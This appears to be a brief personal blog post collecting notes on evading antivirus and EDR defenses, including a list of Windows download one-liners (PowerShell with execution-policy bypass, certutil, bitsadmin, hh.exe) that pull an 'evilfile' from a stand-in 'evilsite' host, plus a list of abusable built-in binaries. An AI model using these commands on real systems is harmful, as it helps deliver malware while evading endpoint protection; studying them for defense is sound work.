Notes :: Getting around some Defenses

Posted on by tmack
Computer Posts Background 1

Trying to read up on this for some work things. Dropping a few links here. Will add more notes as I go on.

——————————————————————

bypassing-cylance-and-other-avs-edrs-by-unhooking-windows-apis

“””
It’s worth noting that not all the functions get hijacked by AVs/EDRs. Usually only those functions that are known to be abused over and over again in the wiled that get hooked – think CreareRemoteThread, NtQueueApcThread and similar.
“””

This led me to this article: old School Evil Excel 4 Macros

——————————————————————

Somehow ended up here: Alternate Download Ideas

  • powershell.exe -ep bypass Invoke-WebRequest -Uri http://evilsite:port/evilfile -OutFile c:\temp\evilfile
  • powershell.exe -ep bypass Invoke-RestMethod -Uri http://evilsite:port/evilfile -OutFile c:\temp\evilfile
  • powershell.exe -ep bypass Start-BitsTransfer -Source http://evilsite:port/evilfile -Destination c:\temp\evilfile
  • certutil.exe -urlcache -split -f “http://evilsite:port/evilfile” c:\temp\evilfile
  • bitsadmin /transfer myDownloadJob /download /priority normal http://evilsite:port/evilfile c:\temp\evilfile
  • hh.exe “http://evilsite/evilfile”

——————————————————————

Then I started digging more into this, as I probably should have from the beginning; LOL bins
“””
Right now there are:

  • Bitsadmin.exe
  • Certutil.exe
  • Esentutl.exe
  • Expand.exe
  • Extrac32.exe
  • Findstr.exe
  • Hh.exe
  • Ieexec.exe
  • Makecab.exe
  • Replace.exe for Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 and the equivalent Server versions.
    “””